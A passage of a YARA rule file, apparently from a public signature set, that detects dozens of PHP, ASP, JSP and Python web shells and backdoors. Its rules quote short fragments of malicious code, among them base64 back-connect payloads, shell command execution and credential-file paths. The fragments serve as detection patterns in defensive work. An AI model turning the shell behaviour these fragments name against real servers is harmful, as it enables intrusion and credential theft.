--==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shel" $s2 = "ConnectBack Backdoor" condition: 1 of them } rule DefaceKeeper_0_2_php { meta: description = "Semi-Auto-generated - file DefaceKeeper_0.2.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "713c54c3da3031bc614a8a55dccd7e7f" strings: $s0 = "target fi1e:<br><input type=\"text\" name=\"target\" value=\"index.php\"></br>" fullword $s1 = "eval(base64_decode(\"ZXZhbChiYXNlNjRfZGVjb2RlKCJhV2R1YjNKbFgzVnpaWEpmWVdKdmNuUW9" $s2 = "<img src=\"http://s43.radikal.ru/i101/1004/d8/ced1f6b2f5a9.png\" align=\"center" condition: 1 of them } rule shells_PHP_wso { meta: description = "Semi-Auto-generated - file wso.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "33e2891c13b78328da9062fbfcf898b6" strings: $s0 = "$back_connect_p=\"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbi" $s3 = "echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=pos" condition: 1 of them } rule backdoor1_php { meta: description = "Semi-Auto-generated - file backdoor1.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "e1adda1f866367f52de001257b4d6c98" strings: $s1 = "echo \"[DIR] <A HREF=\\\"\".$_SERVER['PHP_SELF'].\"?rep=\".realpath($rep.\".." $s2 = "class backdoor {" $s4 = "echo \"<a href=\\\"\".$_SERVER['PHP_SELF'].\"?copy=1\\\">Copier un fichier</a> <" condition: 1 of them } rule elmaliseker_asp { meta: description = "Semi-Auto-generated - file elmaliseker.asp.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "b32d1730d23a660fd6aa8e60c3dc549f" strings: $s0 = "if Int((1-0+1)*Rnd+0)=0 then makeEmail=makeText(8) & \"@\" & makeText(8) & \".\"" $s1 = "<form name=frmCMD method=post action=\"<%=gURL%>\">" $s2 = "dim zombie_array,special_array" $s3 = "http://vnhacker.org" condition: 1 of them } rule indexer_asp { meta: description = "Semi-Auto-generated - file indexer.asp.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "9ea82afb8c7070817d4cdf686abe0300" strings: $s0 = "<td>Nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input typ" $s2 = "D7nD7l.km4snk`JzKnd{n_ejq;bd{KbPur#kQ8AAA==^#~@%>></td><td><input type=\"submit" condition: 1 of them } rule DxShell_php_php { meta: description = "Semi-Auto-generated - file DxShell.php.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "33a2b31810178f4c2e71fbdeb4899244" strings: $s0 = "print \"\\n\".'Tip: to view the file \"as is\" - open the page in <a href=\"'.Dx" $s2 = "print \"\\n\".'<tr><td width=100pt class=linelisting><nobr>POST (php eval)</td><" condition: 1 of them } rule s72_Shell_v1_1_Coding_html { meta: description = "Semi-Auto-generated - file s72 Shell v1.1 Coding.html.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "c2e8346a5515c81797af36e7e4a3828e" strings: $s0 = "Dizin</font></b></font><font face=\"Verdana\" style=\"font-size: 8pt\"><" $s1 = "s72 Shell v1.0 Codinf by Cr@zy_King" $s3 = "echo \"<p align=center>Dosya Zaten Bulunuyor</p>\"" condition: 1 of them } rule hidshell_php_php { meta: description = "Semi-Auto-generated - file hidshell.php.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "c2f3327d60884561970c63ffa09439a4" strings: $s0 = "<?$d='G7mHWQ9vvXiL/QX2oZ2VTDpo6g3FYAa6X+8DMIzcD0eHZaBZH7jFpZzUz7XNenxSYvBP2Wy36U" condition: all of them } rule kacak_asp { meta: description = "Semi-Auto-generated - file kacak.asp.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "907d95d46785db21331a0324972dda8c" strings: $s0 = "Kacak FSO 1.0" $s1 = "if request.querystring(\"TGH\") = \"1\" then" $s3 = "<font color=\"#858585\">BuqX</font></a></font><font face=\"Verdana\" style=" $s4 = "mailto:BuqX@hotmail.com" condition: 1 of them } rule PHP_Backdoor_Connect_pl_php { meta: description = "Semi-Auto-generated - file PHP Backdoor Connect.pl.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "57fcd9560dac244aeaf95fd606621900" strings: $s0 = "LorD of IRAN HACKERS SABOTAGE" $s1 = "LorD-C0d3r-NT" $s2 = "echo --==Userinfo==-- ;" condition: 1 of them } rule Antichat_Socks5_Server_php_php { meta: description = "Semi-Auto-generated - file Antichat Socks5 Server.php.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "cbe9eafbc4d86842a61a54d98e5b61f1" strings: $s0 = "$port = base_convert(bin2hex(substr($reqmessage[$id], 3+$reqlen+1, 2)), 16, 10);" fullword $s3 = "# [+] Domain name address type" $s4 = "www.antichat.ru" condition: 1 of them } rule Antichat_Shell_v1_3_php { meta: description = "Semi-Auto-generated - file Antichat Shell v1.3.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "40d0abceba125868be7f3f990f031521" strings: $s0 = "Antichat" $s1 = "Can't open file, permission denide" $s2 = "$ra44" condition: 2 of them } rule Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2_php { meta: description = "Semi-Auto-generated - file Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "49ad9117c96419c35987aaa7e2230f63" strings: $s0 = "Welcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy" $s1 = "Mode Shell v1.0</font></span>" $s2 = "has been already loaded. PHP Emperor <xb5@hotmail." condition: 1 of them } rule mysql_php_php { meta: description = "Semi-Auto-generated - file mysql.php.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "12bbdf6ef403720442a47a3cc730d034" strings: $s0 = "action=mysqlread&mass=loadmass\">load all defaults" $s2 = "if (@passthru($cmd)) { echo \" -->\"; $this->output_state(1, \"passthru" $s3 = "$ra44 = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = " condition: 1 of them } rule Worse_Linux_Shell_php { meta: description = "Semi-Auto-generated - file Worse Linux Shell.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "8338c8d9eab10bd38a7116eb534b5fa2" strings: $s1 = "print \"<tr><td><b>Server is:</b></td><td>\".$_SERVER['SERVER_SIGNATURE'].\"</td" $s2 = "print \"<tr><td><b>Execute command:</b></td><td><input size=100 name=\\\"_cmd" condition: 1 of them } rule cyberlords_sql_php_php { meta: description = "Semi-Auto-generated - file cyberlords_sql.php.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "03b06b4183cb9947ccda2c3d636406d4" strings: $s0 = "Coded by n0 [nZer0]" $s1 = " www.cyberlords.net" $s2 = "U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAAMUExURf///wAAAJmZzAAAACJoURkAAAAE" $s3 = "return \"<BR>Dump error! Can't write to \".htmlspecialchars($file);" condition: 1 of them } rule cmd_asp_5_1_asp { meta: description = "Semi-Auto-generated - file cmd-asp-5.1.asp.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "8baa99666bf3734cbdfdd10088e0cd9f" strings: $s0 = "Call oS.Run(\"win.com cmd.exe /c del \"& szTF,0,True)" fullword $s3 = "Call oS.Run(\"win.com cmd.exe /c \"\"\" & szCMD & \" > \" & szTF &" fullword condition: 1 of them } rule pws_php_php { meta: description = "Semi-Auto-generated - file pws.php.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "ecdc6c20f62f99fa265ec9257b7bf2ce" strings: $s0 = "<div align=\"left\"><font size=\"1\">Input command :</font></div>" fullword $s1 = "<input type=\"text\" name=\"cmd\" size=\"30\" class=\"input\"><br>" fullword $s4 = "<input type=\"text\" name=\"dir\" size=\"30\" value=\"<? passthru(\"pwd\"); ?>" condition: 2 of them } rule PHP_Shell_php_php { meta: description = "Semi-Auto-generated - file PHP Shell.php.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "a2f8fa4cce578fc9c06f8e674b9e63fd" strings: $s0 = "echo \"</form><form action=\\\"$SFileName?$urlAdd\\\" method=\\\"post\\\"><input" $s1 = "echo \"<form action=\\\"$SFileName?$urlAdd\\\" method=\\\"POST\\\"><input type=" condition: all of them } rule Ayyildiz_Tim___AYT__Shell_v_2_1_Biz_html { meta: description = "Semi-Auto-generated - file Ayyildiz Tim -AYT- Shell v 2.1 Biz.html.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "8a8c8bb153bd1ee097559041f2e5cf0a" strings: $s0 = "Ayyildiz" $s1 = "TouCh By iJOo" $s2 = "First we check if there has been asked for a working directory" $s3 = "http://ayyildiz.org/images/whosonline2.gif" condition: 2 of them } rule EFSO_2_asp { meta: description = "Semi-Auto-generated - file EFSO_2.asp.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "b5fde9682fd63415ae211d53c6bfaa4d" strings: $s0 = "Ejder was HERE" $s1 = "*~PU*&BP[_)f!8c2F*@#@&~,P~P,~P&q~8BPmS~9~~lB~X`V,_,F&*~,jcW~~[_c3TRFFzq@#@&PP,~~" condition: 2 of them } rule lamashell_php { meta: description = "Semi-Auto-generated - file lamashell.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "de9abc2e38420cad729648e93dfc6687" strings: $s0 = "lama's'hell" fullword $s1 = "if($_POST['king'] == \"\") {" $s2 = "if (move_uploaded_file($_FILES['fila']['tmp_name'], $curdir.\"/\".$_FILES['f" condition: 1 of them } rule Ajax_PHP_Command_Shell_php { meta: description = "Semi-Auto-generated - file Ajax_PHP Command Shell.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "93d1a2e13a3368a2472043bd6331afe9" strings: $s1 = "newhtml = '<b>File browser is under construction! Use at your own risk!</b> <br>" $s2 = "Empty Command..type \\\"shellhelp\\\" for some ehh...help" $s3 = "newhtml = '<font size=0><b>This will reload the page... :(</b><br><br><form enct" condition: 1 of them } rule JspWebshell_1_2_jsp { meta: description = "Semi-Auto-generated - file JspWebshell 1.2.jsp.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "70a0ee2624e5bbe5525ccadc467519f6" strings: $s0 = "JspWebshell" $s1 = "CreateAndDeleteFolder is error:" $s2 = "<td width=\"70%\" height=\"22\"> <%=env.queryHashtable(\"java.c" $s3 = "String _password =\"111\";" condition: 2 of them } rule Sincap_php_php { meta: description = "Semi-Auto-generated - file Sincap.php.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "b68b90ff6012a103e57d141ed38a7ee9" strings: $s0 = "$baglan=fopen(\"/tmp/$ekinci\",'r');" $s2 = "$tampon4=$tampon3-1" $s3 = "@aventgrup.net" condition: 2 of them } rule Test_php_php { meta: description = "Semi-Auto-generated - file Test.php.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "77e331abd03b6915c6c6c7fe999fcb50" strings: $s0 = "$yazi = \"test\" . \"\\r\\n\";" fullword $s2 = "fwrite ($fp, \"$yazi\");" fullword $s3 = "$entry_line=\"HACKed by EntriKa\";" fullword condition: 1 of them } rule Phyton_Shell_py { meta: description = "Semi-Auto-generated - file Phyton Shell.py.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "92b3c897090867c65cc169ab037a0f55" strings: $s1 = "sh_out=os.popen(SHELL+\" \"+cmd).readlines()" fullword $s2 = "# d00r.py 0.3a (reverse|bind)-shell in python by fQ" fullword $s3 = "print \"error; help: head -n 16 d00r.py\"" fullword $s4 = "print \"PW:\",PW,\"PORT:\",PORT,\"HOST:\",HOST" fullword condition: 1 of them } rule mysql_tool_php_php { meta: description = "Semi-Auto-generated - file mysql_tool.php.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "5fbe4d8edeb2769eda5f4add9bab901e" strings: $s0 = "$error_text = '<strong>Failed selecting database \"'.$this->db['" $s1 = "$ra44 = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_SERV" $s4 = "<div align=\"center\">The backup process has now started<br " condition: 1 of them } rule Zehir_4_asp { meta: description = "Semi-Auto-generated - file Zehir 4.asp.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "7f4e12e159360743ec016273c3b9108c" strings: $s2 = "</a><a href='\"&dosyapath&\"?status=10&dPath=\"&f1.path&\"&path=\"&path&\"&Time=" $s4 = "<input type=submit value=\"Test Et!\" onclick=\"" condition: 1 of them } rule sh_php_php { meta: description = "Semi-Auto-generated - file sh.php.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "330af9337ae51d0bac175ba7076d6299" strings: $s1 = "$ar_file=array('/etc/passwd','/etc/shadow','/etc/master.passwd','/etc/fstab','/e" $s2 = "Show <input type=text size=5 value=\".((isset($_POST['br_st']))?$_POST['br_st']:" condition: 1 of them } rule phpbackdoor15_php { meta: description = "Semi-Auto-generated - file phpbackdoor15.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "0fdb401a49fc2e481e3dfd697078334b" strings: $s1 = "echo \"fichier telecharge dans \".good_link(\"./\".$_FILES[\"fic\"][\"na" $s2 = "if(move_uploaded_file($_FILES[\"fic\"][\"tmp_name\"],good_link(\"./\".$_FI" $s3 = "echo \"Cliquez sur un nom de fichier pour lancer son telechargement. Cliquez s" condition: 1 of them } rule phpjackal_php { meta: description = "Semi-Auto-generated - file phpjackal.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "ab230817bcc99acb9bdc0ec6d264d76f" strings: $s3 = "$dl=$_REQUEST['downloaD'];" $s4 = "else shelL(\"perl.exe $name $port\");" condition: 1 of them } rule sql_php_php { meta: description = "Semi-Auto-generated - file sql.php.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "8334249cbb969f2d33d678fec2b680c5" strings: $s1 = "fputs ($fp, \"# RST MySQL tools\\r\\n# Home page: http://rst.void.ru\\r\\n#" $s2 = "http://rst.void.ru" $s3 = "print \"<a href=\\\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&" condition: 1 of them } rule cgi_python_py { meta: description = "Semi-Auto-generated - file cgi-python.py.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "0a15f473e2232b89dae1075e1afdac97" strings: $s0 = "a CGI by Fuzzyman" $s1 = "\"\"\"+fontline +\"Version : \" + versionstring + \"\"\", Running on : \"\"\" + " $s2 = "values = map(lambda x: x.value, theform[field]) # allows for" condition: 1 of them } rule ru24_post_sh_php_php { meta: description = "Semi-Auto-generated - file ru24_post_sh.php.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "5b334d494564393f419af745dc1eeec7" strings: $s1 = "<title>Ru24PostWebShell - \".$_POST['cmd'].\"</title>" fullword $s3 = "if ((!$_POST['cmd']) || ($_POST['cmd']==\"\")) { $_POST['cmd']=\"id;pwd;uname -a" $s4 = "Writed by DreAmeRz" fullword condition: 1 of them } rule DTool_Pro_php { meta: description = "Semi-Auto-generated - file DTool Pro.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "366ad973a3f327dfbfb915b0faaea5a6" strings: $s0 = "r3v3ng4ns\\nDigite" $s1 = "if(!@opendir($chdir)) $ch_msg=\"dtool: line 1: chdir: It seems that the permissi" $s3 = "if (empty($cmd) and $ch_msg==\"\") echo (\"Comandos Exclusivos do DTool Pro\\n" condition: 1 of them } rule telnetd_pl { meta: description = "Semi-Auto-generated - file telnetd.pl.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "5f61136afd17eb025109304bd8d6d414" strings: $s0 = "0ldW0lf" fullword $s1 = "However you are lucky :P" $s2 = "I'm FuCKeD" $s3 = "ioctl($CLIENT{$client}->{shell}, &TIOCSWINSZ, $winsize);#" $s4 = "atrix@irc.brasnet.org" condition: 1 of them } rule php_include_w_shell_php { meta: description = "Semi-Auto-generated - file php-include-w-shell.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "4e913f159e33867be729631a7ca46850" strings: $s0 = "$dataout .= \"<td><a href='$MyLoc?$SREQ&incdbhost=$myhost&incdbuser=$myuser&incd" $s1 = "if($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) $strOutput .= DB" condition: 1 of them } rule Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php { meta: description = "Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "6163b30600f1e80d2bb5afaa753490b6" strings: $s0 = "Safe0ver" fullword $s1 = "Script Gecisi Tamamlayamadi!" $s2 = "document.write(unescape('%3C%68%74%6D%6C%3E%3C%62%6F%64%79%3E%3C%53%43%52%49%50%" condition: 1 of them } rule shell_php_php { meta: description = "Semi-Auto-generated - file shell.php.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "1a95f0163b6dea771da1694de13a3d8d" strings: $s1 = "/* We have found the parent dir. We must be carefull if the parent " fullword $s2 = "$tmpfile = tempnam('/tmp', 'phpshell');" $s3 = "if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {" fullword condition: 1 of them } rule telnet_cgi { meta: description = "Semi-Auto-generated - file telnet.cgi.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "dee697481383052980c20c48de1598d1" strings: $s0 = "www.rohitab.com" $s1 = "W A R N I N G: Private Server" $s2 = "print \"Set-Cookie: SAVEDPWD=;\\n\"; # remove password cookie" $s3 = "$Prompt = $WinNT ? \"$CurrentDir> \" : \"[admin\\@$ServerName $C" condition: 1 of them } rule ironshell_php { meta: description = "Semi-Auto-generated - file ironshell.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "8bfa2eeb8a3ff6afc619258e39fded56" strings: $s0 = "www.ironwarez.info" $s1 = "$cookiename = \"wieeeee\";" $s2 = "~ Shell I" $s3 = "www.rootshell-team.info" $s4 = "setcookie($cookiename, $_POST['pass'], time()+3600);" condition: 1 of them } rule backdoorfr_php { meta: description = "Semi-Auto-generated - file backdoorfr.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "91e4afc7444ed258640e85bcaf0fecfc" strings: $s1 = "www.victime.com/index.php?page=http://emplacement_de_la_backdoor.php , ou en tan" $s2 = "print(\"<br>Provenance du mail : <input type=\\\"text\\\" name=\\\"provenanc" condition: 1 of them } rule aspydrv_asp { meta: description = "Semi-Auto-generated - file aspydrv.asp.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "1c01f8a88baee39aa1cebec644bbcb99" score = 60 strings: $s0 = "If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.Item(LCase(sIndex))" $s1 = "password" $s2 = "session(\"shagman\")=" condition: 2 of them } rule cmdjsp_jsp { meta: description = "Semi-Auto-generated - file cmdjsp.jsp.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "b815611cc39f17f05a73444d699341d4" strings: $s0 = "// note that linux = cmd and windows = \"cmd.exe /c + cmd\" " fullword $s1 = "Process p = Runtime.getRuntime().exec(\"cmd.exe /C \" + cmd);" fullword $s2 = "cmdjsp.jsp" $s3 = "michaeldaw.org" fullword condition: 1 of them } rule h4ntu_shell__powered_by_tsoi_ { meta: description = "Semi-Auto-generated - file h4ntu shell [powered by tsoi].txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "06ed0b2398f8096f1bebf092d0526137" strings: $s0 = "h4ntu shell" $s1 = "system(\"$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp\");" condition: 1 of them } rule Ajan_asp { meta: description = "Semi-Auto-generated - file Ajan.asp.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "b6f468252407efc2318639da22b08af0" strings: $s1 = "c:\\downloaded.zip" $s2 = "Set entrika = entrika.CreateTextFile(\"c:\\net.vbs\", True)" fullword $s3 = "http://www35.websamba.com/cybervurgun/" condition: 1 of them } rule PHANTASMA_php { meta: description = "Semi-Auto-generated - file PHANTASMA.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "52779a27fa377ae404761a7ce76a5da7" strings: $s0 = ">[*] Safemode Mode Run</DIV>" $s1 = "$file1 - $file2 - <a href=$SCRIPT_NAME?$QUERY_STRING&see=$file>$file</a><br>" $s2 = "[*] Spawning Shell" $s3 = "Cha0s" condition: 2 of them } rule MySQL_Web_Interface_Version_0_8_php { meta: description = "Semi-Auto-generated - file MySQL Web Interface Version 0.8.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "36d4f34d0a22080f47bb1cb94107c60f" strings: $s0 = "SooMin Kim" $s1 = "http://popeye.snu.ac.kr/~smkim/mysql" $s2 = "href='$PHP_SELF?action=dropField&dbname=$dbname&tablename=$tablename" $s3 = "<th>Type</th><th> M </th><th> D </th><th>unsigned</th><th>zerofi" condition: 2 of them } rule simple_cmd_html { meta: description = "Semi-Auto-generated - file simple_cmd.html.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "c6381412df74dbf3bcd5a2b31522b544" strings: $s1 = "<title>G-Security Webshell</title>" fullword $s2 = "<input type=TEXT name=\"-cmd\" size=64 value=\"<?=$cmd?>\" " fullword $s3 = "<? if($cmd != \"\") print Shell_Exec($cmd);?>" fullword $s4 = "<? $cmd = $_REQUEST[\"-cmd\"];?>" fullword condition: all of them } rule _1_c2007_php_php_c100_php { meta: description = "Semi-Auto-generated - from files 1.txt, c2007.php.php.txt, c100.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" super_rule = 1 hash0 = "44542e5c3e9790815c49d5f9beffbbf2" hash1 = "d089e7168373a0634e1ac18c0ee00085" hash2 = "38fd7e45f9c11a37463c3ded1c76af4c" strings: $s0 = "echo \"<b>Changing file-mode (\".$d.$f.\"), \".view_perms_color($d.$f).\" (\"" $s3 = "echo \"<td> <a href=\\\"\".$sql_surl.\"sql_act=query&sql_query=\".ur" condition: 1 of them } rule _nst_php_php_img_php_php_nstview_php_php { meta: description = "Semi-Auto-generated - from files nst.php.php.txt, img.php.php.txt, nstview.php.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" super_rule = 1 hash0 = "ddaf9f1986d17284de83a17fe5f9fd94" hash1 = "17a07bb84e137b8aa60f87cd6bfab748" hash2 = "4745d510fed4378e4b1730f56f25e569" strings: $s0 = "<tr><form method=post><td><font color=red><b>Back connect:</b></font></td><td><i" $s1 = "$perl_proxy_scp = \"IyEvdXNyL2Jpbi9wZXJsICANCiMhL3Vzci91c2MvcGVybC81LjAwNC9iaW4v" $s2 = "<tr><form method=post><td><font color=red><b>Backdoor:</b></font></td><td><input" condition: 1 of them } rule _network_php_php_xinfo_php_php_nfm_php_php { meta: description = "Semi-Auto-generated - from files network.php.php.txt, xinfo.php.php.txt, nfm.php.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" super_rule = 1 hash0 = "acdbba993a5a4186fd864c5e4ea0ba4f" hash1 = "2601b6fc1579f263d2f3960ce775df70" hash2 = "401fbae5f10283051c39e640b77e4c26" strings: $s0 = ".textbox { background: White; border: 1px #000000 solid; color: #000099; font-fa" $s2 = "<input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''" condition: all of them } rule _w_php_php_c99madshell_v2_1_php_php_wacking_php_php_SpecialShell_99_php_php { meta: description = "Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, SpecialShell_99.php.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" super_rule = 1 hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2" hash1 = "3ca5886cd54d495dc95793579611f59a" hash2 = "9c5bb5e3a46ec28039e8986324e42792" hash3 = "09609851caa129e40b0d56e90dfc476c" strings: $s2 = "echo \"<hr size=\\\"1\\\" noshade><b>Done!</b><br>Total time (secs.): \".$ft" $s3 = "$fqb_log .= \"\\r\\n------------------------------------------\\r\\nDone!\\r" condition: 1 of them } rule _r577_php_php_SnIpEr_SA_Shell_php_r57_php_php_r57_Shell_php_php_spy_php_php_s_php_php { meta: description = "Semi-Auto-generated - from files r577.php.php.txt, SnIpEr_SA Shell.php.txt, r57.php.php.txt, r57 Shell.php.php.txt, spy.php.php.txt, s.php.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" super_rule = 1 hash0 = "0714f80f35c1fddef1f8938b8d42a4c8" hash1 = "911195a9b7c010f61b66439d9048f400" hash2 = "eddf7a8fde1e50a7f2a817ef7cece24f" hash3 = "8023394542cddf8aee5dec6072ed02b5" hash4 = "eed14de3907c9aa2550d95550d1a2d5f" hash5 = "817671e1bdc85e04cc3440bbd9288800" strings: $s2 = "'eng_text71'=>\"Second commands param is:\\r\\n- for CHOWN - name of new owner o" $s4 = "if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult" condition: 1 of them } rule _c99shell_v1_0_php_php_c99php_SsEs_php_php_ctt_sh_php_php { meta: description = "Semi-Auto-generated - from files c99shell_v1.0.php.php.txt, c99php.txt, SsEs.php.php.txt, ctt_sh.php.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" super_rule = 1 hash0 = "d8ae5819a0a2349ec552cbcf3a62c975" hash1 = "9e9ae0332ada9c3797d6cee92c2ede62" hash2 = "6cd50a14ea0da0df6a246a60c8f6f9c9" hash3 = "671cad517edd254352fe7e0c7c981c39" strings: $s0 = "\"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze\"" $s2 = "\"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm\"" $s4 = "\"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo\"" condition: 2 of them } rule _r577_php_php_spy_php_php_s_php_php { meta: description = "Semi-Auto-generated - from files r577.php.php.txt, spy.php.php.txt, s.php.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" super_rule = 1 hash0 = "0714f80f35c1fddef1f8938b8d42a4c8" hash1 = "eed14de3907c9aa2550d95550d1a2d5f" hash2 = "817671e1bdc85e04cc3440bbd9288800" strings: $s2 = "echo $te.\"<div align=center><textarea cols=35 name=db_query>\".(!empty($_POST['" $s3 = "echo sr(45,\"<b>\".$lang[$language.'_text80'].$arrow.\"</b>\",\"<select name=db>" condition: 1 of them } rule _w_php_php_c99madshell_v2_1_php_php_wacking_php_php_c99shell_v1_0_php_php_c99php_SpecialShell_99_php_php_ctt_sh_php_php { meta: description = "Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, SpecialShell_99.php.php.txt, ctt_sh.php.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" super_rule = 1 hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2" hash1 = "3ca5886cd54d495dc95793579611f59a" hash2 = "9c5bb5e3a46ec28039e8986324e42792" hash3 = "d8ae5819a0a2349ec552cbcf3a62c975" hash4 = "9e9ae0332ada9c3797d6cee92c2ede62" hash5 = "09609851caa129e40b0d56e90dfc476c" hash6 = "671cad517edd254352fe7e0c7c981c39" strings: $s0 = " if ($copy_unset) {foreach($sess_data[\"copy\"] as $k=>$v) {unset($sess_data[\"" $s1 = " if (file_exists($mkfile)) {echo \"<b>Make File \\\"\".htmlspecialchars($mkfile" $s2 = " echo \"<center><b>MySQL \".mysql_get_server_info().\" (proto v.\".mysql_get_pr" $s3 = " elseif (!fopen($mkfile,\"w\")) {echo \"<b>Make File \\\"\".htmlspecialchars($m" condition: all of them } rule _w_php_php_c99madshell_v2_1_php_php_wacking_php_php_c99shell_v1_0_php_php_c99php_SpecialShell_99_php_php { meta: description = "Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, SpecialShell_99.php.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" super_rule = 1 hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2" hash1 = "3ca5886cd54d495dc95793579611f59a" hash2 = "9c5bb5e3a46ec28039e8986324e42792" hash3 = "d8ae5819a0a2349ec552cbcf3a62c975" hash4 = "9e9ae0332ada9c3797d6cee92c2ede62" hash5 = "09609851caa129e40b0d56e90dfc476c" strings: $s0 = "$sess_data[\"cut\"] = array(); c99_s" $s3 = "if ((!eregi(\"http://\",$uploadurl)) and (!eregi(\"https://\",$uploadurl))" condition: 1 of them } rule 